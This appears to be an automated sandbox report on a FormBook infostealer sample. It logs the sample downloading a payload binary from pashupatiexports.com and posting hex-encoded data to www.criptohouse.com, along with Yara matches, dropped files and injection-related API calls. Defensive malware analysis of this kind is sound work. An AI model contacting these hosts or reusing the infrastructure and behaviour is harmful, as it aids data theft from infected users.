6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: GET /bin_hzgJnJgi173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pashupatiexports.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /h2s/?L48Hat=JZppaGuo8tb/Wg9K8KFoiK07esopG7Fv+ZRkorRAZiFZKSPuahWSLcFfANW1R99W0phJ&KN98bL=_v2HRVCXLJ90 HTTP/1.1Host: www.hookbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /h2s/?L48Hat=bMh33HuRgKDpY/y5BaHo7Jgx7M+JN321x5doFz59jAJwuNYRwM6nR/ehq53kINTgdUX/&KN98bL=_v2HRVCXLJ90 HTTP/1.1Host: www.criptohouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: pashupatiexports.com
      Source: unknownHTTP traffic detected: POST /h2s/ HTTP/1.1Host: www.criptohouse.comConnection: closeContent-Length: 183440Cache-Control: no-cacheOrigin: http://www.criptohouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.criptohouse.com/h2s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4c 34 38 48 61 74 3d 54 75 74 4e 70 69 50 6b 30 4f 37 68 50 4e 36 6f 4a 4e 36 43 72 66 73 35 28 4a 53 76 44 32 57 6a 72 73 30 53 57 68 64 32 6a 52 56 48 6e 64 34 5f 68 74 72 6a 5a 59 28 74 34 70 75 36 4d 64 33 36 43 52 33 37 6f 4d 68 75 68 4d 45 57 31 44 51 50 67 39 34 5a 50 78 76 56 73 49 61 65 57 6f 57 51 69 62 56 76 72 58 6f 46 6c 73 69 61 76 34 44 2d 7e 35 64 64 59 42 70 78 57 48 34 50 71 64 38 68 72 31 52 38 76 64 58 48 4e 55 32 65 5a 32 35 50 43 4f 7a 58 67 50 77 59 28 4e 73 5f 75 30 53 41 66 52 48 73 77 64 75 5f 5a 71 4a 56 57 53 45 77 76 39 4f 64 70 42 47 7a 54 70 31 54 73 63 68 75 4d 56 34 48 74 73 4d 43 6a 74 6b 4e 4c 49 76 57 61 75 6a 71 6b 61 77 64 44 4f 42 63 46 52 59 6e 41 69 69 46 59 59 56 68 48 6d 36 45 77 6b 33 46 28 66 62 56 76 30 55 51 31 6b 51 38 51 75 4d 6f 62 7a 43 71 6e 34 66 38 4c 55 32 5f 76 49 47 35 35 33 66 79 54 32 4a 34 36 56 47 42 76 42 75 73 39 68 7a 77 71 35 35 38 47 68 70 74 4e 4e 42 4c 67 76 67 59 76 48 5a 68 6a 7a 61 68 41 51 59 6a 6d 5a 61 52 53 46 48 79 43 38 57 34 6a 45 4e 66 38 79 36 2d 30 5a 48 70 6e 43 54 72 49 52 6c 5f 4a 31 70 53 67 63 72 35 6f 43 59 38 36 55 37 70 78 6f 69 32 58 70 31 77 7e 4e 69 77 79 74 59 7a 61 2d 38 4a 41 4d 6a 58 6e 5a 30 4e 67 6c 39 73 72 34 32 4c 63 46 4e 79 65 41 35 59 71 4b 77 67 55 72 49 48 38 4d 74 4a 54 70 63 36 75 6a 52 74 4c 32 42 45 39 49 6a 6e 54 6d 54 34 51 30 67 55 4f 77 50 57 72 75 70 53 38 54 66 4c 31 62 61 58 57 4c 63 39 39 54 45 73 35 63 62 6f 45 6b 32 33 77 56 44 55 75 58 45 69 41 54 64 51 4f 42 67 38 30 64 33 38 35 49 78 4c 47 69 38 4f 7e 2d 72 71 33 77 41 67 30 56 58 64 57 46 6a 55 4a 6e 77 36 6f 66 38 2d 62 70 6a 7a 65 78 73 38 5a 31 6b 6d 56 4a 33 52 4d 5a 43 77 4c 6d 44 54 6d 45 59 37 4e 66 66 36 4b 57 7e 61 39 32 4a 55 51 56 45 4c 58 5a 58 57 56 2d 43 39 77 51 41 52 45 43 4b 4f 69 4a 6b 38 45 43 68 48 50 4f 54 71 63 32 48 51 7a 58 72 72 44 69 49 7a 64 52 71 74 69 79 70 4e 48 69 54 4d 28 51 68 79 4a 51 64 73 77 6c 4d 4c 31 5a 4c 65 34 53 36 62 7e 4d 54 32 45 47 48 43 45 36 70 78 33 67 6f 43 4f 6d 67 62 4b 71 54 47 64 55 38 53 47 6b 31 5a 48 79 48 73 52 75 68 53 70 61 42 50 73 4a 36 50 38 49 47 4c 59 76 4e 33 30 35 48 53 42 6e 43 59 4a 52 65 44 28 70 59 64 69 35 57 75 7e 34 74 72 51 72 77 4b 34 37 4e 4e 6a 41 58 63 4d 44 53 62 34 55 48 69 49 50 28 53 78 6f 73 75 45 55 57 65 4a 74 77 45 71 2d 7a 4c 36 34 49 6f 5a 70 74 51 5a 6e 6a 39 48 61 62 35 42 45 67 32 63 54 39 36 78 5f 4c 33 7a 63 37 76 70 35 45 79 57 32 46 53 61 4d 59 46 6e 36 6a 45 68 5a 53 4b 38 44 45 6a 5a 6a 33 38 58 64 77 42 6a 6d 6a 48 75 35 59 69 58 4f 6e 6b 59 31 30 56 4c 43 6b 7a 65 36 56 37 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jun 2020 10:39:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/S
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915394791.0000000000560000.00000040.00000001.sdmp, IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/bin_hzgJnJgi173.bin
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/bin_hzgJnJgi173.binP=
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/bin_hzgJnJgi173.binS
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000000.890811257.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

      Source: vp2d3tbpivbxnjq8.exe, 0000000D.00000002.1474270295.0000000000780000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\083NCCSS\083logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\083NCCSS\083logrf.iniJump to dropped file
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\083NCCSS\083logrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F29D5 NtProtectVirtualMemory,0_2_029F29D5
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2DC3 NtResumeThread,0_2_029F2DC3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F0F4F NtWriteVirtualMemory,0_2_029F0F4F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F10DC NtWriteVirtualMemory,0_2_029F10DC
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2DC9 NtResumeThread,0_2_029F2DC9
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F01C1 NtSetInformationThread,TerminateProcess,0_2_029F01C1
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA720 NtResumeThread,LdrInitializeThunk,1_2_1F2FA720
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA700 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1F2FA700
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA750 NtCreateFile,LdrInitializeThunk,1_2_1F2FA750
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA610 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1F2FA610
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA6A0 NtCreateSection,LdrInitializeThunk,1_2_1F2FA6A0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA560 NtQuerySystemInformation,LdrInitializeThunk,1_2_1F2FA560
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA540 NtDelayExecution,LdrInitializeThunk,1_2_1F2FA540
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA5F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1F2FA5F0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA410 NtQueryInformationToken,LdrInitializeThunk,1_2_1F2FA410
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA4A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1F2FA4A0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA480 NtMapViewOfSection,LdrInitializeThunk,1_2_1F2FA480
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA360 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1F2FA360
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA3E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1F2FA3E0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA240 NtReadFile,LdrInitializeThunk,1_2_1F2FA240
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA2D0 NtClose,LdrInitializeThunk,1_2_1F2FA2D0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA710 NtQuerySection,1_2_1F2FA710
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA780 NtOpenDirectoryObject,1_2_1F2FA780
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA650 NtQueueApcThread,1_2_1F2FA650
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA6D0 NtCreateProcessEx,1_2_1F2FA6D0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA520 NtEnumerateKey,1_2_1F2FA520
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FBD40 NtSuspendThread,1_2_1F2FBD40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA5A0 NtWriteVirtualMemory,1_2_1F2FA5A0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA430 NtQueryVirtualMemory,1_2_1F2FA430
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FB410 NtOpenProcessToken,1_2_1F2FB410
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA460 NtOpenProcess,1_2_1F2FA460
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FB470 NtOpenThread,1_2_1F2FB470
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA470 NtSetInformationFile,1_2_1F2FA470
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FACE0 NtCreateMutant,1_2_1F2FACE0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA310 NtEnumerateValueKey,1_2_1F2FA310
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA370 NtQueryInformationProcess,1_2_1F2FA370
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA350 NtQueryValueKey,1_2_1F2FA350
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA3D0 NtCreateKey,1_2_1F2FA3D0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA220 NtWaitForSingleObject,1_2_1F2FA220
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FBA30 NtSetContextThread,1_2_1F2FBA30
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA260 NtWriteFile,1_2_1F2FA260
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA2F0 NtQueryInformationFile,1_2_1F2FA2F0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA800 NtSetValueKey,1_2_1F2FA800
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FB0B0 NtGetContextThread,1_2_1F2FB0B0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005629D5 NtProtectVirtualMemory,1_2_005629D5
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562DC3 NtSetInformationThread,1_2_00562DC3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005601C1 NtSetInformationThread,1_2_005601C1
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562DC9 NtSetInformationThread,1_2_00562DC9
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_020929D5 NtProtectVirtualMemory,14_2_020929D5
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_020901C1 NtSetInformationThread,14_2_020901C1
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401D510_2_00401D51
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_004015140_2_00401514
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E5A0_2_00401E5A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E5D0_2_00401E5D
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E750_2_00401E75
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E030_2_00401E03
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E1B0_2_00401E1B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E210_2_00401E21
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E260_2_00401E26
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E2F0_2_00401E2F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401DEF0_2_00401DEF
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401DF80_2_00401DF8
